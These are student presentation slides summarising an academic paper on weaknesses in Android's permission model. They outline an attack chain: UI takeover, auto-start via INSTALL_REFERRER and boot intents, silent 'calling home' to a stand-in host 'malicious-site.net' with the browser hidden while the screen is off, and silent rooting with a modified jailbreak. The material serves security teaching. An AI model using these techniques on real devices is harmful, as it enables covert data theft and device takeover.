Group_Order09
advertisement
Messing with Android's
Permission Model
出處:2012 IEEE 11th International Conference on Trust, Security and
Privacy in Computing and Communications
作者:Andr’e Egners, Ulrike Meyer , Bjorn Marschollek
組員:9720114王人弘 9820117陳冠謀 9862218盧軒偉
Outline
1.
Introduction
2.
Related work
3.
Overview on Android
4.
Android’s permission model
5.
Attacks
6.
1.
UI takeover
2.
Starting Applications after Installation
3.
Starting Applications at Boot
4.
E.T. Calling Home
5.
Silently Rooting Android
Conclusion
2/23
I. INTRODUCTION
在行動裝置上安裝APP時,通常會跳出對話框,要求使用者
接受程式所請求的權限或是停止安裝。
使用者對於給予的權限可能會造成什麼風險並不清楚。
Permission Model的設計上,各種選項的精細程度和可變程
度太小,這使攻擊者容易繞過Permission Model的控管。
本篇會介紹Android的Permission Model及一些攻擊的方式。
3/23
II. RELATED WORK
殭屍網路(botnet)
Inter-Application communication
Permissions of Android apps
其他安全機制與系統漏洞的相關議題
4/23
III. OVERVIEW ON ANDROID
Based on 2.6 Linux kernel
具有Linux的優點(file, memory management)和Java類型的
安全性
5/23
III. OVERVIEW ON ANDROID (Cont.)
6/23
III. OVERVIEW ON ANDROID (Cont.)
最底層是Linux kernel,包含process和memory的管理、各
種驅動程式……。針對行動裝置的需求進行優化。
第二層是各種函式庫,包含C library,圖形的2D/3D-graphic
library,整理檔案資料的SQLite...…。
同樣在第二層的還有Android runtime所需要的東西,主要是
Dalvik Virtual Machine,由Java Virtual Machine衍生而來,
更適合用在資源有限的裝置上。
7/23
III. OVERVIEW ON ANDROID (Cont.)
Application Framework Layer:提供API給應用程式的開發
者使用。其中包含了Package Manager (追蹤管理應用程式和
它的資料)、 Location Manager (管理應用程式的位置)、
View System (UI、繪圖) ……。
最上層是應用程式所在的地方,third-party applications都
在這層。可以使用下面的框架、函式庫……。
8/23
IV. ANDROID’S PERMISSION MODEL
API version 11,116 different permissions are predefine
Ex. INTERNET – allow accessing the Internet
RECEIVE_SMS – for monitoring, recording, or processing incoming SMS
RECORD_AUDIO – for recording audio messages
Ex. Tetris game request Internet is reasonable but suspicious if it would also
requested the permission to read the address book
9/23
URI Permissions
Uniform Resource Identifier
Applications may wish to pass a URI to another application in order to be able
to exchange data.
For example, an email application usually protects its emails from being read
by other applications using additionally defined permissions.
a third-party image viewer should not hold the permissions to read emails
directly.
image viewer should rather be handed a URI to the data by using the
Intent.FLAG_GRANT_READ_URI_PERMISSION flag set by the callee of the
function. This enables the receiver, i.e., the image viewer, to read the data
at the given URI.
10/23
Permission protection level
Level zero – normal permissions ,low risk
setting timer, making the phone vibrate
the user can request to be notified of the permission request prior to the
installation of the application.
Level one – dangerous permissions ,high risk
initiating phone calls, access to the device’s sensors, the
Internet, or sensitive user data, read log file
Prior to the installation, installer displays the set of requested dangerous
permissions to the user, which decides to either grant or deny the set permissions
Only if the user gives his consent to all of the requested permissions, the
application can successfully be installed.
11/23
Permission protection level (Cont.)
Level two – signature permissions
only if the requesting application is signed with the same
certificate as the application that declared the permission
user agree but no signature cannot be granted
Level three – signatureOrSystem
only to applications that are in the Android system image or
that are signed with the same certificates .
12/23
Permission protection level (Cont.)
some flaws
the user is only able to grant or deny all permissions at once.
granting or denying a particular permission is not possible.
refraining from installing an application which might be useful, but requests
too many or a suspicious set of permissions.
Tetris example
13/23
Known Vulnerabilities
Log permissions
FAT32 formatted SD cards
WebKit browser
Most uncovered the past years
14/23
V. ATTACKS
An attack path to silently root android
1.
Taking over the UI
2.
Starting directly after installation
3.
Also starting at boot
4.
Two-way Internet communication
5.
Silently rooting the device
15/23
1.UI takeover
•
KeyIntercepter
- onKeyDown() : handle or pass
- handle them but doing nothing
•
The Home button
- Return to Home screen or Show a list of the recently used
•
Installing from Android Market
- The install button -??-> The OK button
16/23
2.Starting Applications after Installation
•
Would the user start the app?
•
to receive the INSTALL_REFERRER intent
- Google Analytics SDK
- chosen by the attacker
17/23
2.Starting Applications after Installation (Cont.)
<receiver
Android:name=“com.google.android.apps.analytics.AnalyticsReceiver”
Android:exported=“true” >
<intent-filter>
<action android:nace=“com.android.vending.INSTALL_REFERRER”/>
</intent-filter>
</receiver>
18/23
3.Starting Applications at Boot
BOOT_COMPLETED intent
Permission –RECEIVE_BOOT_COMPLETED is introduced to
prevent from illegitimately starting at system boot... but is
forgotten
Successfully listenning for the intent without asking for
permission
19/23
4.E.T. Calling Home
Establishing bidiectional outside communication
e.g. a specified dropzone delivering user data,or
a command & control server of a botnet
-----------------------------VIEW intent-------------------------------------------
startActivity(new Intent(Intent.ACTION_VIEW, Uri.
Parse(''http://malicious-site.net'')).
setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
20/23
4.E.T. Calling Home (Cont.)
Request HTTP GET to send data
URI schemes : deliver data to applications
SilentCommunicator
- screen off: start the transmission
- screen on: browser hide
21/23
5.Silently Rooting Android
modified zimperlich-jailbreak:each instance runs with root
privileges
setuid() calls which intended to change the owner to the user but
has been assigned to the calling application -> fail
infinite loop which executes the native code until exception
Root user can install app and the device owner will not notice!
22/23
VI. CONCLUSION
本篇文章提供了一些Android權限模型的漏洞。攻擊者可藉
由這些漏洞,偷偷的建立雙向的通道,並下載額外的攻擊。更
可以利用不令人起疑的授權請求,來做更複雜的攻擊。
23/23
